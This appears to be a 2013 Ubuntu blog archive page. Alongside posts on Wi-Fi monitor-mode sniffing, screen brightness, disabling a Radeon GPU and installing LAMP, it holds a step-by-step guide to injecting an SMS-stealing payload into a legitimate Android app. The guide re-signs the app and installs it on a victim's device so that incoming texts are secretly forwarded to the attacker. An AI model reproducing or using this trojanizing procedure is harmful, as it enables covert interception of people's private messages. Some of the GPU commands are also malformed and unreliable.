Sunday, September 8, 2013

Sniff Public Traffic with Wireshark Monitor Mode and BroadCom Wireless card

In this post I'll show you how to sniff packets with Wireshark Monitor mode in Ubuntu. First of all you need to check what wireless driver you have installed in your computer. In my case in ubuntu 13.04, you can check your driver installation at Additional Drivers.

Click on the Ubuntu logo of the upper left corner, and search for Software and Updates and click on it.

In the Software and Updates dialog box, click on Additional Drivers Tab and check whether what driver you have installed for wireless device. In my case it was like;

The problem is, you cannot sniff public traffic with monitor mode using the above Broadcom STA driver. So click on Do not user the device and save it and restart your computer. This option does not mean anything that it's name really implies. In only does stop using the above mentioned driver and users default open source driver.

One additional thing, it you type sudo iwconfig in the terminal and run, you can view all wireless interfaces in your computer. Check whether your real wireless interface has been listed there as a wireless interface (such as wlan0). If it is listed as an ethernet interface (such as eth1), the problem is you are still using the BroadCom STA driver. Make sure it is listed as a wireless interface before you go into following steps.

Wireless Monitor Mode

      If you have used wireshark previously, you may have sniffed packets coming to one of your interfaces. For that you need to connect to the access point/ad-hoc network that you need to sniff packets. In Wireless Monitor mode, you don't need to connect to any network, you can freely sniff packets through Wireshark. This can be done only with Wireless Devices since you cannot receive other's packets with wired connected switches.

Promiscuous Mode
      Promiscuous mode is a special mode for hubs (not switches) in which you can capture all packets travel through the hub. For this case, you need to connect to the network that you need to sniff. This mode is not enables by default in switches since it fowards packets to the port which the intended receiver has connected to. It does not simple flood packets to all ports in the switch. For this, a switch has a memory associated with it which can map ports to receiver's MAC addresses

Enable Monitor Mode in BroadCom wireless card

               You can use a bash script in ubuntu called airmon-ng to put your wireless card in monitor mode. Just run following command.

sudo airmon-ng start wlan0

You can see following output.

In the output you can see, monitor mode enables on mon0.

This mon0 is an interface created by airmon-ng, in which monitor mode has been enabled. You can use this interface in wireshark to sniff all public packets.

Open wireshark, in the home screen double click on the mon0 interface, listed in interfaces list.

     If you cannot see any interface in the interfaces list, it means that you don't have enough previleges. You need to add your username into wireshark user group as follows (You can start wireshark as root and see all interfaces but wireshark discourages running it with sudo)
$ sudo dpkg-reconfigure wireshark-common
$ sudo usermod -a -G wireshark <username>

and restart your machine to take effect

When you double click on mon0, you can see following options.

Check the checkbox Capture Packets in monitor mode. Then click OK.

Then go to Capture --> Interfaces.

Uncheck all interfaces except mon0 (If there's high wireless traffic around you, you'll see hundred thousands of packets go through that interface).

Then start the capture. Done ! You'll see wireshark captures all wireless traffic.

Starting monitor  mode with airmon-ng is essential. Without using it, you'll be able to start a sniff in monitor mode with wlan0 interface if you have connected to a network, but withing 10 seconds of the capture, you'll be disconnected from your wireless network.

Thursday, September 5, 2013

Change Screen Brightness in Ubuntu Terminal

I had a problem in my HP pavilion G6 Laptop with brightness change. I could not change the brightness using my function keys. Though I could change brightness by the Brightness & Lock settings, lowest brightness level was too bright for me. So I used following method to reduce the brightness.

sudo -s
nano /sys/class/backlight/intel_backlight/brightness

(In my case it was intel_backlight. This may change from computer to computer.) Edit the value of the file. In my case, the value was about 4000. So I reduced it to 800 and saved. Then the brightness was reduces. You can reduce the brightness into any level by just editing this file.

If you want to reduce the brightness at every startup, include following command in /etc/rc/local file.( /etc/rc.local file is executed at the end of every startup. If you put a command there, you can run that command at every startup)

echo 800 > /sys/class/backlight/intel_backlight/brightness

Restart your computer and you'll see your command is effective.

A little more fun : 
       I created a small shell script (.sh) to reduce my brightness to any amount at any time easily. But for this script I would have changed the brightness using the entire command given above. This shell script made it easy. I just needed to execute the shell script and pass brightness value as a command line parameter as follows.

./brightness 600

Here is my shell script:
echo $1 > /sys/class/backlight/intel_backlight/brightness

echo "[+] Brightness set to $1\n"

Android Malware Injection into Original Apps in Ubuntu

This is a post I have posted in my other blog Insider Attack.

In this post I am going to describe how malicious apps can be injected into an original apps using UBUNTU. For this post I have created a small malicious app which intercepts incoming SMS and fowards to another person without victim  knowing when message receives. You need to have following files to do this:

  • APKtool (for WIndows, you may need to download a windows version of apktool here)
  • SignAPK.jar + keys
  • Malicious SMSHacker.apk app
You can download all these stuff with this link;

Here is a rough sketch of our process to do this..
  1. Decompile the original android app (.apk) using apktool
  2. Decompile the malicious android app (SMSHacker.apk) using apktool
  3. Inject decompiled malicious app's files(Copy malicious files into) into decompiled original app
  4. Inject permissions in the malicious apk file's AndroidManifest.xml into original file's AndroidManifest.xml
  5. Recompile the infected original app using apktool
  6. Sign the recompiled app using signapk.jar
  7. Install recompiled-signed apk file into victim's device
Let's follow the listed steps;

Step 1:

    Download all files I have given in the above mediafire link. I have included all required files including sample SMSHacker app to test. And copy all files into a single directory.

Copy your apk file into which you need to inject SMSHacker into the same directory. You can keep your apk file in your own directory, but you need to mention the path to it explicitly in the following step.

Open a terminal and go to that directory. Run following command to decompile your original apk file(Android App). Lets say your original apk filename is myapp.apk;

./apktool d myapp.apk MyAppDec

In this above command 'd' switch means you are decompiling myapp.apk file. With 'MyAppDec', you mention include decompiled app in a directory named 'MyAppDec' in the same folder.

Step 2:

Now decompile your malicious file too (SMSHacker.apk);

./apktool d SMSHacker.apk SMSHackerDec

Then you'll see two directories called SMSHackerDec and MyAppDec in the same folder in which decompiled files are included.

Step 3:

If you browse into these folders, you'll note that there is a folder called smali in both the decompiled app folders. This smali folder includes all decompiled files from the apks. When you decompile an apk, they are decompiled into a file type called .smali. Now go into the folder which include all smali files of the malware (SMSHacker) with this command.

cd /SMSHackerDec/smali/com/sms/smshacker/

Then open SMSHacker.smali file in gedit.

gedit SMSHacker.smali

I created this malware and tested on emulators. So I have set the sms fowarding mobile number as '5554'. You can change it to your own one and let all receiving messages of victim be fowarded to your own number. So search for the string '5554' in the SMSHacker.smali file and replace it with your preferred number. (say your backup phone :D).

Now copy these malicious files into decompiled original app's files.

cd ../../../../../
cp SMSHackerDec/smali/com/* -R MyAppDec/smali/com/

Then you have injected files into the original folder. Now we need to inject required permissions from the SMSHacker's AndroidManifest.xml file into the original file's AndroidManifest.xml file.

Step 4:

Open SMSHacker's AndroidManifest.xml file in gedit.

gedit SMSHackerDec/AndroidManifest.xml

You'll see three lines in the file like these.

    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />

Actually we do not need the 3rd permission for this sake. So copy first two lines into the MyAppDec/AndroidManifest.xml file before <application> tag.

And also you might see few lines like followings inside the malicious file's AndroidManifest.xml

<receiver android:name="com.sms.smshacker.SMSHacker">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />

Copy this part into MyAppDec/AndroidManifest.xml within <application> tag and before  first <activity> tag.

Now save  MyAppDec/AndroidManifest.xml file and close gedit.

Now we have succesfully injected files and permissions. Now we can recompile the new app using apktool.

Step 5:

Go to the directory where apktool and other files exist and run apktool to recompile the app.

./apktool b -f MyAppDec myhackedapp.apk

This 'b' switch means build and '-f' switch means 'force'. This '-f' neglects any file changes in the apk file and compile it without any issues.

After running that command you'll see a new myhackedapp.apk file inside the same folder.

Step 6:

We need to sign that app using signapk.jar before installation. This signing task is important before installation since you cannot install an app on a device or an emulator without signing it.

Sign your apk file using following command.

java -jar signapk.jar testkey.x509.pem testkey.pk8 myhackedapp.apk myhackedapp-signed.apk

You'll see your signed apk file named myhackedapp-signed.apk.

Now we are done. We can install this apk file in any device and let victim execute the malicious code.

This SMSHacker.apk is actually an app with a Broadcast receiver. What it does is, when a message is received it gets invoked and executes the code inside its handler. I have included code to foward message to another phone inside the handler. We need to include <receiver> information inside the AndroidManifest.xml file to get this to work. That's why we injected <receiver> information from the malicious manifest file into the original manifest file. And also we require permissions to read an incoming messge and send a sms. So we injected permissions to read sms and send sms in original app's manifest. 

When installed, this would be visible as a normal app in victims device, and when victim runs the app for the first time receiver starts. After that if victim closes the original app the receiver continues listening for incoming sms.

I have included this in a module in the Android Exploitation Framework I am currently developing for a project. In that framework, one can use many types of payloads to inject to any original app.

Thanks for reading and if there are any issues, post a comment below.

Wednesday, September 4, 2013

Shutdown Radeon Graphics card and save battery and solve overheat problem

If you are using radeon graphics or any other dedicated AMD graphics card with Intel Graphics in your laptop, you might have encountered a problem of overheating and lesser battary life. You can shut down AMD graphics card permanently and let Intel Graphics card work and solve these two problems. In my case, I have a HP Pavilion G6 with AMD radeon 6470M and I also faced that situation. So I run following commands and shut down AMD graphics card. Now my overheat problem is solved and my battary life became normal.

Run followings in terminal

sudo chown -R username:username  #replace 'username' with your username
sudo -s
echo off /sys/kernel/debug/vgaswitcheroo/switch

To run this in every startup, open /etc/rc.local file,

sudo nano /etc/rc.local

Include echo off /sys/kernel/debug/vgaswitcheroo/switch in that file before exit statement.

Install and configure LAMP Server and PhpMyAdmin on Ubuntu

Hello all, As my first post in my Ubuntu blog I am going to describe how to install and configure Apache web server in ubuntu. Most tutorials found on internet either describes how to install Apache web server or how to install PHPmyadmin on ubuntu. In this tutorial I'll describe how to install Apache web server using LAMP (Linux version of WAMP as you may know), install PhpMyadmin and configure it to work in coperation with Apache and discuss some frequently asked questions on working with Apache on ubuntu. Well, lets start..

We are going to install LAMP(stands for Linux Apache MySQL PHP) on Ubuntu which is a 3 in 1 server. If you have ever used WAMP on windows, this is the similar version for ubuntu. After installing LAMP, you can run your PHP pages/websites on your local machine.

To install LAMP, go to ubuntu terminal and run following commands

sudo apt-get install lamp-server^

When you are asked for username and password for MySQL Database access, give a preferred username and a password.

After finishing your installation, you can whether your webserver works by just browsing to http://localhost in your browser. If LAMP is installed properly and running, you might see a simple web page like 'It Works'.
If you cannot access localhost, either your installation is unsuccessful or your web server is not running yet. If you have installed properly and the server has not been started yet, you can start your web server manually by running following command.

sudo ./etc/init.d/apache2 start

Now since you have completed installation of LAMP, lets install PhpMyAdmin. Run following commands to install it.

sudo apt-get install phpmyadmin

And then we have to configure phpmyadmin to work with apache. For that, run the following command.

sudo gedit /etc/apache2/apache2.conf

Now gedit will open apache2.conf file for you, and add the following line at the end of the file.

Include /etc/phpmyadmin/apache.conf

Save the file and restart apache web server with the following command.

sudo /etc/init.d/apache2 restart

Check your phpmyadmin installation by browsing to http://localhost/phpmyadmin in your browser. You will be directed to phpmyadmin and you can log into it using username and the password you provided for MySQL at the installation of LAMP.

Now you have successfully configured both LAMP and Phpmyadmin, you can run a website by copying the files of the website into /var/www/ folder. Note that writing into this folder requires root permissions and you need to copy files into it in terminal with sudo, or you need to launch nautilus as root (running sudo nautilus in terminal) to copy  files in ubuntu GUI. This is an annoying thing for a new user for ubuntu. So lets find a solution for this.

Since writing into the website directory requires root permissions, we can change the website directory into our own one into which we can write with existing permission. We can create a directory in our home directory and configure it as the www folder. To do that, follow these steps.

Open following files as follows and replace any string like '/var/www' into your prefered web folder name (say /home/<your-username>/www)

sudo gedit /etc/apache2/sites-available/default
sudo gedit /etc/apache2/sites-available/default-ssl

Then restart the Apache :

sudo /etc/init.d/apache2 restart

Now you can easiy copy files into your folder and access them via browser.